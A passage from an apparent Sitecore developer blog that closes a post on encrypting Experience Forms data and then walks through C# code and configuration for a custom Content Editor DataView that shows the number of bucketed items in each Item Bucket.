I then wired everything together using the following Sitecore patch configuration file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <services> <configurator type="Sandbox.Foundation.Forms.FormsServicesConfigurator, Sandbox.Foundation.Forms" /> <register serviceType="Sitecore.ExperienceForms.IFormDataProvider, Sitecore.ExperienceForms"> <patch:delete /> </register> </services> <moduleSettings> <foundation> <forms> <formEncryptionSettings type="Sandbox.Foundation.Forms.Models.FormEncryptionSettings, Sandbox.Foundation.Forms" singleInstance="true"> <!-- I stole this from https://sitecorejunkie.com/2013/06/21/encrypt-web-forms-for-marketers-fields-in-sitecore/ --> <EncryptionKey>88bca90e90875a</EncryptionKey> </formEncryptionSettings> </forms> </foundation> </moduleSettings> </sitecore> </configuration> I want to call out that I’m deleting the OOTB IFormDataProvider above using a patch:delete. I’m re-adding it via the IServicesConfigurator above using the decorator class shown previously. Let’s take this for a spin. I first created a new form (this is under “Forms” on the Sitecore Launchpad). I then put it on a page with an MVC Layout; published everything; navigated to the test page with the form created above; filled out the form; and then clicked the submit button. Let’s see if the data was encrypted. I opened up SQL Server Management Studio and ran a query on the FormEntry table in my Experience Forms Database. As you can see, the data was encrypted. Let’s export the data to make sure it gets decrypted. We can do that by exporting the data as a CSV from Forms in the Sitecore Launchpad. As you can see, the data is decrypted in the CSV. I do want to mention that Sitecore MVP João Neto had provided two other methods for encrypting data in Experience Forms in a post he wrote last January. I recommend having a read of that. Until next time, see you on the Sitecore Slack 😉 Display How Many Bucketed Items Live Within a Sitecore Item Bucket Using a Custom DataView Over the past few weeks — if you haven’t noticed — I’ve been having a blast experimenting with Sitecore Item Buckets. It seems new ideas on what to build for it keep flooding my thoughts every day. 😀 However, the other day an old idea that I wanted to solve a while back bubbled its way up into the forefront of my consciousness: displaying the count of Bucketed Items which live within each Item Bucket in the Content Tree. I’m sure someone has built something to do this before though I didn’t really do any research on it as I was up for the challenge. In all honesty, I enjoy spending my nights after work and on weekends building things in Sitecore — even if someone has built something like it before — as it’s a great way to not only discover new treasures hidden within the Sitecore assemblies, but also improve my programming skills — the saying “you lose it if you don’t use it” applies here. You might be asking “Mike, we don’t store that many Sitecore Items in our Item Buckets; I can just go count them all by hand”. Well, if that’s the case for you then you might want to reconsider why you are using the Item Buckets feature. However, in theory, thousands if not millions of Items can live within an Item Bucket in Sitecore.
If counting by hand is your thing — or even writing some sort of “script” (I’m not referring to PowerShell scripts that you would write using Sitecore PowerShell Extensions (SPE) — I definitely recommend harnessing all of the power this module has to offer — but instead to standalone ASP.NET Web Forms which some people erroneously call “scripts”) to generate some kind of report, then by all means go for it. That’s just not how I roll. So how are we going to display these counts to the user? We are ultimately going to create a custom Sitecore DataView. If you aren’t familiar with DataViews in Sitecore, they basically allow you to change how Items are displayed in the Sitecore Content Tree. I’m not going to go too much into the details of how these work. I recommend having a read of the posts on DataViews by two fellow Sitecore MVPs for more information and to see other examples. I do want to warn you: there is a lot of code in this post. You might want to go get a snack for this as it might take a while to get through all the code that I am showing here. Don’t worry, I’ll wait for you to get back. Anyways, let’s jump right into it. For this feature, I want to add a checkbox toggle in the Sitecore Ribbon to give users the ability to turn this feature on and off. In order to save the state of this checkbox, I defined the following interface: namespace Sitecore.Sandbox.Web.UI.HtmlControls.Registries { public interface IRegistry { bool GetBool(string key); bool GetBool(string key, bool defaultvalue); int GetInt(string key); int GetInt(string key, int defaultvalue); string GetString(string key); string GetString(string key, string defaultvalue); string GetValue(string key); void SetBool(string key, bool val); void SetInt(string key, int val); void SetString(string key, string value); void SetValue(string key, string value); } } Classes implementing the above interface will keep track of settings which need to be stored somewhere.
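For instance, persisting and reading the checkbox state through this abstraction boils down to the sketch below. It uses the wrapper class shown next, and the registry key is the one registered in the patch configuration file towards the end of this post:

using Sitecore.Sandbox.Web.UI.HtmlControls.Registries;

// Minimal usage sketch: save the checkbox state under the registry key
// configured later in this post, then read it back with a default of false.
IRegistry registry = new Registry();
registry.SetBool("/Current_User/UserOptions.View.ShowBucketedItemsCount", true);
bool showCounts = registry.GetBool("/Current_User/UserOptions.View.ShowBucketedItemsCount", false);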
The following class implements the interface above: namespace Sitecore.Sandbox.Web.UI.HtmlControls.Registries { public class Registry : IRegistry { public virtual bool GetBool(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetBool(key); } public virtual bool GetBool(string key, bool defaultvalue) { return Sitecore.Web.UI.HtmlControls.Registry.GetBool(key, defaultvalue); } public virtual int GetInt(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetInt(key); } public virtual int GetInt(string key, int defaultvalue) { return Sitecore.Web.UI.HtmlControls.Registry.GetInt(key, defaultvalue); } public virtual string GetString(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetString(key); } public virtual string GetString(string key, string defaultvalue) { return Sitecore.Web.UI.HtmlControls.Registry.GetString(key, defaultvalue); } public virtual string GetValue(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetValue(key); } public virtual void SetBool(string key, bool val) { Sitecore.Web.UI.HtmlControls.Registry.SetBool(key, val); } public virtual void SetInt(string key, int val) { Sitecore.Web.UI.HtmlControls.Registry.SetInt(key, val); } public virtual void SetString(string key, string value) { Sitecore.Web.UI.HtmlControls.Registry.SetString(key, value); } public virtual void SetValue(string key, string value) { Sitecore.Web.UI.HtmlControls.Registry.SetValue(key, value); } } } I’m basically wrapping calls to methods on the static Sitecore.Web.UI.HtmlControls.Registry class which is used for saving state on the checkboxes in the Sitecore ribbon — it might be used for keeping track of other things in the Sitecore Content Editor though that is beyond the scope of this post. Nothing magical going on here. I then defined the following interface for keeping track of Content Editor settings for things related to Item Buckets: namespace Sitecore.Sandbox.Buckets.Settings { public interface IBucketsContentEditorSettings { bool ShowBucketedItemsCount { get; set; } bool AreItemBucketsEnabled { get; } } } The ShowBucketedItemsCount boolean property lets the caller know if we are to show the Bucketed Items count, and the AreItemBucketsEnabled boolean property lets the caller know if the Item Buckets feature is enabled in Sitecore. 
The following class implements the interface above: using Sitecore.Diagnostics; using Sitecore.Sandbox.Determiners.Features; using Sitecore.Sandbox.Web.UI.HtmlControls.Registries; namespace Sitecore.Sandbox.Buckets.Settings { public class BucketsContentEditorSettings : IBucketsContentEditorSettings { protected IFeatureDeterminer ItemBucketsFeatureDeterminer { get; set; } protected IRegistry Registry { get; set; } protected string ShowBucketedItemsCountRegistryKey { get; set; } public bool ShowBucketedItemsCount { get { return ShouldShowBucketedItemsCount(); } set { ToggleShowBucketedItemsCount(value); } } public bool AreItemBucketsEnabled { get { return GetAreItemBucketsEnabled(); } } protected virtual bool ShouldShowBucketedItemsCount() { if (!AreItemBucketsEnabled) { return false; } EnsureRegistryDependencies(); return Registry.GetBool(ShowBucketedItemsCountRegistryKey, false); } protected virtual void ToggleShowBucketedItemsCount(bool turnOn) { if (!AreItemBucketsEnabled) { return; } EnsureRegistryDependencies(); Registry.SetBool(ShowBucketedItemsCountRegistryKey, turnOn); } protected virtual void EnsureRegistryDependencies() { Assert.IsNotNull(Registry, "Registry must be defined in configuration!"); Assert.IsNotNullOrEmpty(ShowBucketedItemsCountRegistryKey, "ShowBucketedItemsCountRegistryKey must be defined in configuration!"); } protected virtual bool GetAreItemBucketsEnabled() { Assert.IsNotNull(ItemBucketsFeatureDeterminer, "ItemBucketsFeatureDeterminer must be defined in configuration!"); return ItemBucketsFeatureDeterminer.IsEnabled(); } } } I’m injecting an IFeatureDeterminer instance into the instance of the class above via the Sitecore Configuration Factory — have a look at the patch configuration file further down in this post — specifically the ItemBucketsFeatureDeterminer which is defined in a previous blog post. The IFeatureDeterminer instance determines whether the Item Buckets feature is turned on/off (I’m not going to repost that code here so if you haven’t seen this code, please go have a look now so you have an understanding of what it’s doing). Its instance is used in the GetAreItemBucketsEnabled() method which just delegates to its IsEnabled() method and returns the value from that call. The GetAreItemBucketsEnabled() method is used in the get accessor of the AreItemBucketsEnabled property. I’m also injecting an IRegistry instance into the instance of the class above — this is also defined in the patch configuration file further down — which is used for storing/retrieving the value of the ShowBucketedItemsCount property. It is leveraged in the ShouldShowBucketedItemsCount() and ToggleShowBucketedItemsCount() methods where a boolean value is saved or retrieved, respectively, in the Sitecore Registry under a certain key — this key is also injected into the ShowBucketedItemsCountRegistryKey property via the Sitecore Configuration Factory. So, we now have a way to keep track of whether we should display the Bucketed Items count. We just need a way to let the user turn this on/off. To do that, I need to create a custom Sitecore.Shell.Framework.Commands.Command. 
Since Sitecore Commands are instantiated by the CreateObject() method on the MainUtil class (this lives in the Sitecore namespace in Sitecore.Kernel.dll and isn’t as advanced as the Sitecore.Configuration.Factory class as it won’t instantiate nested objects defined in configuration the way the Sitecore Configuration Factory does), I built the following Command which will decorate Commands defined in Sitecore configuration: using System.Xml; using Sitecore.Configuration; using Sitecore.Diagnostics; using Sitecore.Shell.Framework.Commands; using Sitecore.Web.UI.HtmlControls; using Sitecore.Xml; namespace Sitecore.Sandbox.Shell.Framework.Commands { public class ExtendedConfigCommand : Command { private Command command; protected Command Command { get { if(command == null) { command = GetCommand(); EnsureCommand(); } return command; } } protected virtual Command GetCommand() { XmlNode currentCommandNode = Factory.GetConfigNode(string.Format("commands/command[@name='{0}']", Name)); string configPath = XmlUtil.GetAttribute("extendedCommandPath", currentCommandNode); Assert.IsNotNullOrEmpty(configPath, string.Format("The extendedCommandPath attribute must be set {0}!", currentCommandNode)); Command command = Factory.CreateObject(configPath, false) as Command; Assert.IsNotNull(command, string.Format("The command defined at '{0}' was either not properly set or is not an instance of Sitecore.Shell.Framework.Commands.Command. Double-check it!", configPath)); return command; } protected virtual void EnsureCommand() { Assert.IsNotNull(Command, "GetCommand() cannot return a null Sitecore.Shell.Framework.Commands.Command instance!"); } public override void Execute(CommandContext context) { Command.Execute(context); } public override string GetClick(CommandContext context, string click) { return Command.GetClick(context, click); } public override string GetHeader(CommandContext context, string header) { return Command.GetHeader(context, header); } public override string GetIcon(CommandContext context, string icon) { return Command.GetIcon(context, icon); } public override Control[] GetSubmenuItems(CommandContext context) { return Command.GetSubmenuItems(context); } public override string GetToolTip(CommandContext context, string tooltip) { return Command.GetToolTip(context, tooltip); } public override string GetValue(CommandContext context, string value) { return Command.GetValue(context, value); } public override CommandState QueryState(CommandContext context) { return Command.QueryState(context); } } } The GetCommand() method reads the XmlNode for the current command, and gets the value set on its extendedCommandPath attribute. This value must be a config path defined under the <sitecore> element in Sitecore configuration. If the attribute doesn’t exist or is empty, or a Command instance isn’t properly created, an exception is thrown. Otherwise, it is set on the Command property on the class. All methods here delegate to the same methods on the Command stored in the Command property.
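In other words, at runtime the decorator boils down to roughly the following lookup. This is a condensed sketch of what GetCommand() does, using the command name registered in the patch file at the end of this post:

using System.Xml;
using Sitecore.Configuration;
using Sitecore.Shell.Framework.Commands;
using Sitecore.Xml;

// Condensed view of GetCommand(): find the command's XML node, read its
// extendedCommandPath attribute, and let the Configuration Factory build
// the real Command (nested elements included) from that path.
XmlNode node = Factory.GetConfigNode("commands/command[@name='contenteditor:togglebucketeditemscount']");
string configPath = XmlUtil.GetAttribute("extendedCommandPath", node);
Command inner = Factory.CreateObject(configPath, false) as Command;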
I then defined the following Command which will be used by the checkbox we are adding to the Sitecore Ribbon: using Sitecore.Diagnostics; using Sitecore.Shell.Framework.Commands; using Sitecore.Web.UI.Sheer; using Sitecore.Sandbox.Buckets.Settings; namespace Sitecore.Sandbox.Buckets.Shell.Framework.Commands { public class ToggleBucketedItemsCountCommand : Command { protected IBucketsContentEditorSettings BucketsContentEditorSettings { get; set; } public override void Execute(CommandContext context) { if (!AreItemBucketsEnabled()) { return; } ToggleShowBucketedItemsCount(); Reload(); } protected virtual void ToggleShowBucketedItemsCount() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); BucketsContentEditorSettings.ShowBucketedItemsCount = !BucketsContentEditorSettings.ShowBucketedItemsCount; } protected virtual void Reload() { SheerResponse.SetLocation(string.Empty); } public override CommandState QueryState(CommandContext context) { if(!AreItemBucketsEnabled()) { return CommandState.Hidden; } if(!ShouldShowBucketedItemsCount()) { return CommandState.Enabled; } return CommandState.Down; } protected virtual bool AreItemBucketsEnabled() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); return BucketsContentEditorSettings.AreItemBucketsEnabled; } protected virtual bool ShouldShowBucketedItemsCount() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); return BucketsContentEditorSettings.ShowBucketedItemsCount; } } } The QueryState() method determines whether we should display the checkbox — it will only be displayed if the Item Buckets feature is on — and what the state of the checkbox should be — if we are currently showing the Bucketed Items count, the checkbox will be checked (this is represented by CommandState.Down). Otherwise, it will be unchecked (this is represented by CommandState.Enabled). The Execute() method encapsulates the logic of what we are to do when the user checks/unchecks the checkbox. It’s basically delegating to the ToggleShowBucketedItemsCount() method to toggle the value of whether we are to display the Bucketed Items count, and then reloads the Content Editor to refresh the display in the Content Tree. I then had to define this checkbox in the Core database. I’m not going to go into details of how the above works as I’ve written over a gazillion posts on the subject. I recommend having a read of one of these older posts. After going back to my Master database, I saw the new checkbox in the Sitecore Ribbon. Since we could be dealing with thousands — if not millions — of Bucketed Items for each Item Bucket, we need a performant way to grab the count of these Items.
In this solution, I am leveraging the Sitecore.ContentSearch API to get these counts though I needed to add some custom Computed Index Field classes: using Sitecore.Buckets.Managers; using Sitecore.Configuration; using Sitecore.ContentSearch; using Sitecore.ContentSearch.ComputedFields; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Sandbox.Buckets.Util.Methods; namespace Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields { public class IsBucketed : AbstractComputedIndexField { protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; private set; } public IsBucketed() { ItemBucketsFeatureMethods = GetItemBucketsFeatureMethods(); Assert.IsNotNull(ItemBucketsFeatureMethods, "GetItemBucketsFeatureMethods() cannot return null!"); } protected virtual IItemBucketsFeatureMethods GetItemBucketsFeatureMethods() { IItemBucketsFeatureMethods methods = Factory.CreateObject("buckets/methods/itemBucketsFeatureMethods", false) as IItemBucketsFeatureMethods; Assert.IsNotNull(methods, "the IItemBucketsFeatureMethods instance was not defined properly in /sitecore/buckets/methods/itemBucketsFeatureMethods!"); return methods; } public override object ComputeFieldValue(IIndexable indexable) { Item item = indexable as SitecoreIndexableItem; if (item == null) { return null; } return IsBucketable(item) && IsItemContainedWithinBucket(item); } protected virtual bool IsBucketable(Item item) { Assert.ArgumentNotNull(item, "item"); return BucketManager.IsBucketable(item); } protected virtual bool IsItemContainedWithinBucket(Item item) { Assert.ArgumentNotNull(item, "item"); if(IsItemBucket(item)) { return false; } return ItemBucketsFeatureMethods.IsItemContainedWithinBucket(item); } protected virtual bool IsItemBucket(Item item) { Assert.ArgumentNotNull(item, "item"); if (!ItemBucketsFeatureMethods.IsItemBucket(item)) { return false; } return true; } } } An instance of the class above ultimately determines if an Item is bucketed within an Item Bucket, and passes a boolean value to its caller denoting this via its ComputeFieldValue() method. What determines whether an Item is bucketed? The code above says it’s bucketed only when the Item is bucketable and is contained within an Item Bucket. The IsBucketable() method above ascertains whether the Item is bucketable by delegating to the IsBucketable() method on the BucketManager class in Sitecore.Buckets.dll. The IsItemContainedWithinBucket() method determines if the Item is contained within an Item Bucket — you might be laughing as the name on the method is self-documenting — by delegating to the IsItemContainedWithinBucket() method on the IItemBucketsFeatureMethods instance — I’ve defined the code for this in a previous post so go have a look. Moreover, the code does not consider Item Buckets to be Bucketed as that just doesn’t make much sense. 😉 This would also give us an inaccurate count.
The following Computed Index Field’s ComputeFieldValue() method returns the string representation of the ancestor Item Bucket’s Sitecore.Data.ID for the Item — if it is contained within an Item Bucket: using Sitecore.Configuration; using Sitecore.ContentSearch; using Sitecore.ContentSearch.ComputedFields; using Sitecore.ContentSearch.Utilities; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Sandbox.Buckets.Util.Methods; namespace Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields { public class ItemBucketAncestorId : AbstractComputedIndexField { protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; private set; } public ItemBucketAncestorId() { ItemBucketsFeatureMethods = GetItemBucketsFeatureMethods(); Assert.IsNotNull(ItemBucketsFeatureMethods, "GetItemBucketsFeatureMethods() cannot return null!"); } protected virtual IItemBucketsFeatureMethods GetItemBucketsFeatureMethods() { IItemBucketsFeatureMethods methods = Factory.CreateObject("buckets/methods/itemBucketsFeatureMethods", false) as IItemBucketsFeatureMethods; Assert.IsNotNull(methods, "the IItemBucketsFeatureMethods instance was not defined properly in /sitecore/buckets/methods/itemBucketsFeatureMethods!"); return methods; } public override object ComputeFieldValue(IIndexable indexable) { Item item = indexable as SitecoreIndexableItem; if (item == null) { return null; } Item itemBucketAncestor = GetItemBucketAncestor(item); if(itemBucketAncestor == null) { return null; } return NormalizeGuid(itemBucketAncestor.ID); } protected virtual Item GetItemBucketAncestor(Item item) { Assert.ArgumentNotNull(item, "item"); if(IsItemBucket(item)) { return null; } Item itemBucket = ItemBucketsFeatureMethods.GetItemBucket(item); if(!IsItemBucket(itemBucket)) { return null; } return itemBucket; } protected virtual bool IsItemBucket(Item item) { Assert.ArgumentNotNull(item, "item"); if (!ItemBucketsFeatureMethods.IsItemBucket(item)) { return false; } return true; } protected virtual string NormalizeGuid(ID id) { return IdHelper.NormalizeGuid(id); } } } Not to go too much into details of the class above, it will only return an Item Bucket’s Sitecore.Data.ID as a string if the Item lives within an Item Bucket and is not itself an Item Bucket. If the Item is not within an Item Bucket or is an Item Bucket, null is returned to the caller via the ComputeFieldValue() method. I then created the following subclass of Sitecore.ContentSearch.SearchTypes.SearchResultItem — this lives in Sitecore.ContentSearch.dll — in order to use the values in the index that the previous Computed Field Index classes returned for their storage in the search index: using System.ComponentModel; using Sitecore.ContentSearch; using Sitecore.ContentSearch.Converters; using Sitecore.ContentSearch.SearchTypes; using Sitecore.Data; namespace Sitecore.Sandbox.Buckets.ContentSearch.SearchTypes { public class BucketedSearchResultItem : SearchResultItem { [IndexField("item_bucket_ancestor_id")] [TypeConverter(typeof(IndexFieldIDValueConverter))] public ID ItemBucketAncestorId { get; set; } [IndexField("is_bucketed")] public bool IsBucketed { get; set; } } } Now, we need a class to get the Bucketed Item count for an Item Bucket. 
I defined the following interface for class implementations that do just that: using Sitecore.Data.Items; namespace Sitecore.Sandbox.Buckets.Providers.Items { public interface IBucketedItemsCountProvider { int GetBucketedItemsCount(Item itemBucket); } } I then created the following class that implements the interface above: using System; using System.Collections.Generic; using System.Linq; using System.Linq.Expressions; using System.Xml; using Sitecore.Configuration; using Sitecore.ContentSearch; using Sitecore.ContentSearch.Linq; using Sitecore.ContentSearch.Linq.Utilities; using Sitecore.ContentSearch.SearchTypes; using Sitecore.ContentSearch.Utilities; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Xml; using Sitecore.Sandbox.Buckets.ContentSearch.SearchTypes; namespace Sitecore.Sandbox.Buckets.Providers.Items { public class BucketedItemsCountProvider : IBucketedItemsCountProvider { protected IDictionary<string, ISearchIndex> SearchIndexMap { get; private set; } public BucketedItemsCountProvider() { SearchIndexMap = CreateNewSearchIndexMap(); } protected virtual IDictionary<string, ISearchIndex> CreateNewSearchIndexMap() { return new Dictionary<string, ISearchIndex>(); } protected virtual void AddSearchIndexMap(XmlNode configNode) { if(configNode == null) { return; } string databaseName = XmlUtil.GetAttribute("database", configNode, null); Assert.IsNotNullOrEmpty(databaseName, "The database attribute on the searchIndexMap configuration element cannot be null or the empty string!"); Assert.ArgumentCondition(!SearchIndexMap.ContainsKey(databaseName), "database", "The searchIndexMap configuration element's database attribute values must be unique!"); Database database = Factory.GetDatabase(databaseName); Assert.IsNotNull(database, string.Format("No database exists with the name of '{0}'! Make sure the database attribute on your searchIndexMap configuration element is set correctly!", databaseName)); string searchIndexName = XmlUtil.GetAttribute("searchIndex", configNode, null); Assert.IsNotNullOrEmpty(searchIndexName, "The searchIndex attribute on the searchIndexMap configuration element cannot be null or the empty string!"); ISearchIndex searchIndex = GetSearchIndex(searchIndexName); Assert.IsNotNull(searchIndex, string.Format("No search index exists with the name of '{0}'! 
Make sure the searchIndex attribute on your searchIndexMap configuration element is set correctly", searchIndexName)); SearchIndexMap.Add(databaseName, searchIndex); } public virtual int GetBucketedItemsCount(Item bucketItem) { Assert.ArgumentNotNull(bucketItem, "bucketItem"); ISearchIndex searchIndex = GetSearchIndex(); using (IProviderSearchContext searchContext = searchIndex.CreateSearchContext()) { var predicate = GetSearchPredicate<BucketedSearchResultItem>(bucketItem.ID); IQueryable<SearchResultItem> query = searchContext.GetQueryable<BucketedSearchResultItem>().Filter(predicate); SearchResults<SearchResultItem> results = query.GetResults(); return results.Count(); } } protected virtual ISearchIndex GetSearchIndex() { string databaseName = GetContentDatabaseName(); Assert.IsNotNullOrEmpty(databaseName, "The GetContentDatabaseName() method cannot return null or the empty string!"); Assert.ArgumentCondition(SearchIndexMap.ContainsKey(databaseName), "databaseName", string.Format("There is no ISearchIndex instance mapped to the database: '{0}'!", databaseName)); return SearchIndexMap[databaseName]; } protected virtual string GetContentDatabaseName() { Database database = Context.ContentDatabase ?? Context.Database; Assert.IsNotNull(database, "Argggggh! There's no content database! Houston, we have a problem!"); return database.Name; } protected virtual ISearchIndex GetSearchIndex(string searchIndexName) { Assert.ArgumentNotNullOrEmpty(searchIndexName, "searchIndexName"); return ContentSearchManager.GetIndex(searchIndexName); } protected virtual Expression<Func<TSearchResultItem, bool>> GetSearchPredicate<TSearchResultItem>(ID itemBucketId) where TSearchResultItem : BucketedSearchResultItem { Assert.ArgumentCondition(!ID.IsNullOrEmpty(itemBucketId), "itemBucketId", "itemBucketId cannot be null or empty!"); var predicate = PredicateBuilder.True<TSearchResultItem>(); predicate = predicate.And(item => item.ItemBucketAncestorId == itemBucketId); predicate = predicate.And(item => item.IsBucketed); return predicate; } } } Ok, so what’s going on in the class above? The AddSearchIndexMap() method is called by the Sitecore Configuration Factory to add database-to-search-index mappings — have a look at the patch configuration file further below. The code is looking up the appropriate search index for the content/context database. The GetBucketedItemsCount() method gets the “predicate” from the GetSearchPredicate() method which basically says “Hey, I want an Item that has an ancestor Item Bucket Sitecore.Data.ID which is the same as the Sitecore.Data.ID passed to the method, and also this Item should be bucketed”. The GetBucketedItemsCount() method then employs the Sitecore.ContentSearch API to get the result-set of the Items for the query, and returns the count of those Items. Just as Commands, DataViews in Sitecore are instantiated by the CreateObject() method on MainUtil. I want to utilize the Sitecore Configuration Factory instead so that my nested configuration elements are instantiated and injected into my custom DataView. 
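As a quick aside before the DataView plumbing: once the provider above is registered, exercising it from code is straightforward. Here is a sketch, assuming the config path from the patch file below and a hypothetical bucket path:

using Sitecore.Configuration;
using Sitecore.Data.Items;
using Sitecore.Sandbox.Buckets.Providers.Items;

// Hypothetical usage: resolve the provider the same way the DataView's
// configuration will, then ask it for the count for a given Item Bucket.
IBucketedItemsCountProvider provider = Factory.CreateObject("buckets/providers/items/bucketedItemsCountProvider", true) as IBucketedItemsCountProvider;
Item itemBucket = Sitecore.Context.ContentDatabase.GetItem("/sitecore/content/Home/MyBucket"); // hypothetical path
int bucketedItemsCount = provider.GetBucketedItemsCount(itemBucket);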
Back to the DataView: I built the following interface to make that possible: using System.Collections; using Sitecore.Collections; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; namespace Sitecore.Sandbox.Web.UI.HtmlControls.DataViews { public interface IDataViewBaseExtender { void FilterItems(ref ArrayList children, string filter); void GetChildItems(ItemCollection items, Item item); Database GetDatabase(); Item GetItemFromID(string id, Language language, Version version); Item GetParentItem(Item item); bool HasChildren(Item item, string filter); void Initialize(string parameters); bool IsAncestorOf(Item ancestor, Item item); void SortItems(ArrayList children, string sortBy, bool sortAscending); } } All of the methods in the above interface correspond to virtual methods defined on the Sitecore.Web.UI.HtmlControls.DataViewBase class in Sitecore.Kernel.dll. I then built the following abstract class which extends Sitecore.Web.UI.HtmlControls.DataViewBase and takes, as its type parameter, the DataView class it is standing in for: using System.Collections; using Sitecore.Collections; using Sitecore.Configuration; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Globalization; using Sitecore.Web.UI.HtmlControls; namespace Sitecore.Sandbox.Web.UI.HtmlControls.DataViews { public abstract class ExtendedDataView<TDataView> : DataViewBase where TDataView : DataViewBase { protected IDataViewBaseExtender DataViewBaseExtender { get; private set; } protected ExtendedDataView() { DataViewBaseExtender = GetDataViewBaseExtender(); EnsureDataViewBaseExtender(); } protected virtual IDataViewBaseExtender GetDataViewBaseExtender() { string configPath = GetDataViewBaseExtenderConfigPath(); Assert.IsNotNullOrEmpty(configPath, "GetDataViewBaseExtenderConfigPath() cannot return null or the empty string!"); IDataViewBaseExtender dataViewBaseExtender = Factory.CreateObject(configPath, false) as IDataViewBaseExtender; Assert.IsNotNull(dataViewBaseExtender, string.Format("the IDataViewBaseExtender instance was not defined properly in '{0}'!", configPath)); return dataViewBaseExtender; } protected abstract string GetDataViewBaseExtenderConfigPath(); protected virtual void EnsureDataViewBaseExtender() { Assert.IsNotNull(DataViewBaseExtender, "GetDataViewBaseExtender() cannot return a null IDataViewBaseExtender instance!"); } protected override void FilterItems(ref ArrayList children, string filter) { DataViewBaseExtender.FilterItems(ref children, filter); } protected override void GetChildItems(ItemCollection items, Item item) { DataViewBaseExtender.GetChildItems(items, item); } public override Database GetDatabase() { return DataViewBaseExtender.GetDatabase(); } protected override Item GetItemFromID(string id, Language language, Version version) { return DataViewBaseExtender.GetItemFromID(id, language, version); } protected override Item GetParentItem(Item item) { return DataViewBaseExtender.GetParentItem(item); } public override bool HasChildren(Item item, string filter) { return DataViewBaseExtender.HasChildren(item, filter); } public override void Initialize(string parameters) { DataViewBaseExtender.Initialize(parameters); } public override bool IsAncestorOf(Item ancestor, Item item) { return DataViewBaseExtender.IsAncestorOf(ancestor, item); } protected override void SortItems(ArrayList children, string sortBy, bool sortAscending) { DataViewBaseExtender.SortItems(children, sortBy, sortAscending); } } } The GetDataViewBaseExtender() method gets the config path for the configuration-defined
IDataViewBaseExtender — these IDataViewBaseExtender configuration definitions may or may not have nested configuration elements which will also be instantiated by the Sitecore Configuration Factory — from the abstract GetDataViewBaseExtenderConfigPath() method (subclasses must define this method). The GetDataViewBaseExtender() then employs the Sitecore Configuration Factory to create this IDataViewBaseExtender instance, and return it to the caller (it’s being called in the class’ constructor). If the instance is null, an exception is thrown. All other methods in the above class delegate to methods with the same name and parameters on the IDataViewBaseExtender instance. I then built the following subclass of the abstract class above: using Sitecore.Web.UI.HtmlControls; namespace Sitecore.Sandbox.Web.UI.HtmlControls.DataViews { public class ExtendedMasterDataView : ExtendedDataView<MasterDataView> { protected override string GetDataViewBaseExtenderConfigPath() { return "extendedDataViews/extendedMasterDataView"; } } } The above class is used for extending the MasterDataView in Sitecore. It’s now time for the “real deal” DataView that does what we want: show the Bucketed Item counts for Item Buckets. The instance of the following class does just that: using System.Collections; using Sitecore.Buckets.Forms; using Sitecore.Collections; using Sitecore.Data; using Sitecore.Data.Fields; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Globalization; using Sitecore.Sandbox.Buckets.Providers.Items; using Sitecore.Sandbox.Buckets.Settings; using Sitecore.Sandbox.Buckets.Util.Methods; using Sitecore.Sandbox.Web.UI.HtmlControls.DataViews; namespace Sitecore.Sandbox.Buckets.Forms { public class BucketedItemsCountDataView : BucketDataView, IDataViewBaseExtender { protected IBucketsContentEditorSettings BucketsContentEditorSettings { get; set; } protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; set; } protected IBucketedItemsCountProvider BucketedItemsCountProvider { get; set; } protected string SingularBucketedItemsDisplayNameFormat { get; set; } protected string PluralBucketedItemsDisplayNameFormat { get; set; } void IDataViewBaseExtender.FilterItems(ref ArrayList children, string filter) { FilterItems(ref children, filter); } void IDataViewBaseExtender.GetChildItems(ItemCollection children, Item parent) { GetChildItems(children, parent); } protected override void GetChildItems(ItemCollection children, Item parent) { base.GetChildItems(children, parent); if(!ShouldShowBucketedItemsCount()) { return; } for (int i = children.Count - 1; i >= 0; i--) { Item child = children[i]; if (IsItemBucket(child)) { int count = GetBucketedItemsCount(child); Item alteredItem = GetCountDisplayNameItem(child, count); children.RemoveAt(i); children.Insert(i, alteredItem); } } } protected virtual bool ShouldShowBucketedItemsCount() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); return BucketsContentEditorSettings.ShowBucketedItemsCount; } protected virtual bool IsItemBucket(Item item) { Assert.IsNotNull(ItemBucketsFeatureMethods, "ItemBucketsFeatureMethods must be set in configuration!"); Assert.ArgumentNotNull(item, "item"); return ItemBucketsFeatureMethods.IsItemBucket(item); } protected virtual int GetBucketedItemsCount(Item itemBucket) { Assert.IsNotNull(BucketedItemsCountProvider, "BucketedItemsCountProvider must be set in configuration!"); Assert.ArgumentNotNull(itemBucket, "itemBucket"); return 
